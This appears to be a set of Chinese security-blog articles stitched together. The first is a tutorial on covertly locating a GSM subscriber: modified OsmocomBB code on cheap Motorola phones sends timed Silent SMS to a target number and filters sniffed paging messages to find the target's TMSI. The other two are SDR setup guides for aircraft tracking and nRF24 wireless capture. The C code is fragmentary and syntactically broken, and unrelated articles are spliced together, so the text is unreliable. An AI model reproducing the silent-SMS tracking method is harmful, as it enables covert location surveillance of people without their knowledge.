Motorola C118/C139:玩GSM必备,天然支持跳频,便宜,淘宝只要7元,可大量购买,接在USB Hub上,实现多路短信收发。其中,C139是彩屏,且ROM大些,是有潜力改造成用于复杂GSM攻击或工程路测,且支持中文显示和输入的黑客手机的。

具体实现上,我们需要使用两部C118/C139手机,一部用来发送Silent SMS,另一部用来侦听PCH并记录正在呼叫的TMSI。





0x04 如何发送Silent SMS

OsmocomBB里的mobile程序是工作在Layer 2-3,用来收发短信和接打电话的。我们就修改它来发送Silent SMS。其实,可以把C118/C139看做是最便宜的短信猫,而修改过的mobile程序就是短信群发软件。

构造Silent SMS


我们只要在发短信之前,把对应的字段做好设置,发出的就是Silent SMS了。这两个字段可以都设置,也可以只设置一个。偶尔会碰到运营商过滤特殊格式短信的情况,这时候就需要具体试一下到底哪个有效。我自己到目前为止没遇到过滤的情况。


为了按特定时序发送Silent SMS,我们需要一个定时器。设定好时间间隔,定时器就会被定时触发,然后调用发送函数去发送一条Silent SMS。

struct osmo_timer_list tick_timer_smsping;
struct {
    int pid;
    int dcs;
} silent_sms;



DEFUN(silent, silent_cmd, "silent TP-PID TP-DCS",
    "Set SMS messages header\n"
    "1 for 0x40, 0 for default\n"
    "1 for 0xC0, 0 for default\n")
    int pid;
    int dcs;

    if (argc >= 1) {
        pid = atoi(argv[0]);
        dcs = atoi(argv[1]);
        if (pid) {
   = 1;
        } else {
   = 0;
        if (dcs) {
            silent_sms.dcs = 1;
        } else {
            silent_sms.dcs = 0;

    return CMD_SUCCESS;


if(smscnt == MAX_SMS_Count){//开始批量发送
        tick_timer_smsping.cb = &sms_ping; //初始化定时器 = &timer_step;
        ping_sms_sca = strdup(sms_sca);
        ping_number = strdup(number);
        ping_sms_txt = strdup(argv_concat(argv, argc, 2));
        call_vty = vty;
        sms_send(ms, sms_sca, number, argv_concat(argv, argc, 2));
        vty_out(vty, "Slient SMS %d sent%s", smscnt, VTY_NEWLINE);


struct gsm_sms *sms_from_text(const char *receiver, int dcs, const char *text)
    struct gsm_sms *sms = sms_alloc();

    if (!sms)
        return NULL;

    strncpy(sms->text, text, sizeof(sms->text)-1);

    sms->reply_path_req = 0;
    sms->status_rep_req = 0;
    sms->ud_hdr_ind = 0;
    if (
        sms->protocol_id = 0x40; /* type 0 */
        sms->protocol_id = 0; /* implicit */
    if (silent_sms.dcs)
        sms->data_coding_scheme = 0xC0;
        sms->data_coding_scheme = dcs;
    strncpy(sms->address, receiver, sizeof(sms->address)-1);
    /* Generate user_data */
    sms->user_data_len = gsm_7bit_encode(sms->user_data, sms->text);

    return sms;


void sms_ping(void *data)
    struct osmocom_ms *ms;

    ms = get_ms("1", call_vty);
    vty_notify(ms, "ping sent");

    if(smscnt == 0){
        return 0;

    sms_send(ms, ping_sms_sca, ping_number, ping_sms_txt);
    return 0;
static int gsm411_sms_report(struct osmocom_ms *ms, struct gsm_sms *sms,
    uint8_t cause)
    vty_notify(ms, NULL);
    if (!cause){
        vty_notify(ms, "SMS %d to %s successfull\n", smscnt, sms->address);
        if(smscnt != 0)
            osmo_timer_schedule(&tick_timer_smsping, 10, 0);//定时间隔10秒

        vty_notify(ms, "SMS to %s failed: %s\n", sms->address,
            get_value_string(gsm411_rp_cause_strs, cause));
    return 0;

使用mobile的命令行发送Silent SMS:


使用WireShark侦听发送的短信,可以看到TP-PID和TP-DCS分别是0x40,0xC0,短信内容为“testing 1 2 3”:


0x05 如何筛选TMSI


在开始发送Silent SMS的时候,就立刻启动ccch_scan记录所有Paging的TMSI。通常,从开始发短信,到空中出现Paging信息,最快3秒钟,多数情况6-7秒钟。繁忙的基站每秒广播20多次寻呼。所以我们把TMSI队列深度设为300是足够的,大约可记录从发送Silent SMS开始15秒内的所有被呼叫的TMSI,这300个里面一定有我们的目标的TMSI,通常是在前面开始部分。队列到300为止,我们就是在这300个里面找出来重复次数大于我们设定次数的TMSI并打印出来。


struct _tmsis_ {
    uint8_t     tmsi[4];
    char        cnt;
} tmsis[300];


void tmsi_match(uint8_t *t)
        int i;
        int f=0;
        for(i=0; i  app_state.mincnt){
                    printf("Possible TMSI: #%d, \t%s, %d times\n", i, osmo_hexdump(t,4), tmsis[i].cnt);
            app_state.tmsicnt += 1;
            tmsis[i].cnt = 1;
            printf("New TMSI:#%d, %s \tTotal: %d\n", i, osmo_hexdump(t,4), app_state.tmsicnt);
    if(!memcmp(t, app_state.wanted_tmsi, 4)) {
        app_state.tmsi_matched = 1;
        printf("TMSI Match %s\n", osmo_hexdump(t,4));

我们给ccch_scan新增加一个参数:-f paging次数。

国内不少地方为了提高接通率,当有Mobile Terminated Service要传递的时候是重复发出寻呼信息的,有的是Paging两次,多的甚至连续寻呼四次。这样如果你连续向目标手机发送10次短信,可能会侦听到20-40次Paging。所以你实战中你需要先侦听网络的PCH来以确定当地的设置情况。

static int l23_cfg_print_help()
    printf("\nApplication specific\n");
    printf("  -k --kc KEY           Key to use to try to decipher DCCHs\n");
    printf("  -t --tmsi TMSI        Filter assignments with specified TMSI (paging only)\n");
    printf("  -f --count        Filter paging TMSI\n");

    return 0;

static int l23_cfg_handle(int c, const char *optarg)
    switch (c) {
    case 'k':
        if (osmo_hexparse(optarg, app_state.kc, 8) != 8) {
            fprintf(stderr, "Invalid Kc\n");
    case 't':
        if (osmo_hexparse(optarg, app_state.wanted_tmsi, 4) != 4) {
            fprintf(stderr, "Invalid TMSI\n");
        app_state.finding = 0;
    case 'f':
        app_state.finding = 1;
        app_state.mincnt= atoi(optarg);
        return -1;
    return 0;





我们拿出目标手机来确认一下,果然是这个TMSI。注意,为了工作方便,朝阳群众大都随身携带这种已开启Net Monitor的Nokia 3110手机:






0x06 后记


本文没有涉及LTE下的TMSI筛选和手机定位,但是Paging的原理类似,而且下行的数据报文传递前也会产生Paging信息,再加上运营商的2G/3G/4G是可以互操作的,因而可以利用的途径更多。惟一的问题是缺少基带开源的LTE手机,我们要玩LTE,就必须使用SDR,导致成本不够亲民。即使发送Silent SMS仍然使用C118/C139,侦听LTE通信也必须使用SDR。而且因为我国特殊的频段划分,LTE没有得到低端的黄金频段,基本集中在1900MHz和2600MHz,这样便宜的RTL-SDR也就无能为力了,玩LTE最差也要买个HackRF,但目前国产山寨HackRF质量还不稳定。。。


使用USRP探索无线世界 Part 1:USRP从入门到追踪飞机飞行轨迹


Author:雪碧0xroot @漏洞盒子安全团队

0x00 前言

USRP是数款流行的SDR硬件中功能和应用都相对成熟的一款产品,从WIFI协议、ZigBee协议、RFID协议、GSM通信系统、LTE 4G通信系统到飞机通信、卫星通信USRP都能很好的进行支持。软件开发工程师可以用它开发应用,安全工程师则用它来测试、研究相关的无线通信协议。



(电视棒+dump1090 2D)

Clipboard Image.png




0x01 HardWare

PC:Ubuntu OR Mac



0x02 Software


apt-get update
apt-get install git
apt-get install python-pip

pip install --upgrade pip
pip install git+

pybombs recipes add gr-recipes git+ pybombs recipes add gr-etcetera git+
pybombs prefix init /usr/local -a myprefix -R gnuradio-default
pybombs install gqrx gr-osmosdr uhd

以上内容是Ubuntu下安装SDR相关软件的方法,在Mac OSX中则可以使用mac port 进行安装。


使用pybombs安装完UHD(USRP Hardware Driver)后还需下载固件镜像以及FPGA镜像,执行:

python  /usr/local/lib/uhd/utils/







Clipboard Image.png


git clone
cd gr-air-modes
mkdir build
cd build
cmake ..
sudo make install
sudo ldconfig

2.4 安装谷歌地球

Ubuntu 32 bit:


Ubuntu 64 bit:

sudo dpkg -i google-earth-stable_current_amd64.deb

Mac osx:


Clipboard Image.png

0x03 解码飞机信号&导入谷歌Earth

cd gr-air-modes/apps/
./modex_rx -K test.kml 



Clipboard Image.png


Clipboard Image.png


Clipboard Image.png


Clipboard Image.png

(飞机飞行轨迹 3D)


0x04 演示视频

0x05 refer

USRP B200: Exploring the Wireless World

Aircraft Tracking with Mode S: Modez & Aviation Mapper


0x01 系统安装

下载Ubuntu 16.04

0x02 搭建SDR开发环境


apt-get update
apt-get install git
apt-get install python-pip
pip install --upgrade pip
pip install git+


pybombs recipes add gr-recipes git+  
pybombs recipes add gr-etcetera git+


pybombs install osmo-sdr rtl-sdr gnuradio hackrf airspy gr-iqbal libosmo-dsp gr-osmosdr gqrx


git clone
cd bladeRF/host
mkdir build
cd build
cmake ../
sudo make install
sudo ldconfig

0x03 编译gr-nordic

gr-nordic:GNU Radio module and Wireshark dissector for the Nordic Semiconductor nRF24L Enhanced Shockburst protocol.

git clone
cd gr-nordic/
mkdir build
cd build/
cmake ../
sudo make install
sudo ldconfig

0x04 安装WireShark

apt-get install wireshark

Ubuntu系统中,访问网络端口需要root权限,而wireshark的只是/usr/share/dumpcap的一个UI,/usr/share/dumpcap需要root权限,所以没法non-root用户无法读取网卡列表。解决办法使用sudo wireshark启动抓包,但使用root权限启动wireshark就不能使用lua脚本: 解决方案:

sudo -s  
groupadd wireshark  
usermod -a -G wireshark $你的用户名  
chgrp wireshark /usr/bin/dumpcap  
chmod 750 /usr/bin/dumpcap 

setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
getcap /usr/bin/dumpcap


/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip



0x05 数据包捕获



gr-nordic$ wireshark -X lua_script:wireshark/nordic_dissector.lua -i lo -k -f udp

gr-nordic$cd example


0x06 演示视频

0x07 Thanks & refer

gr-nordic: GNU Radio module and Wireshark dissector for the Nordic Semiconductor nRF24L Enhanced Shockburst protocol.

孤独小白:GNU Radio教程(一)

Sniffing with Wireshark as a Non-Root User

Bastille 巴士底狱安全研究员:Marc NewlinBalint Seeber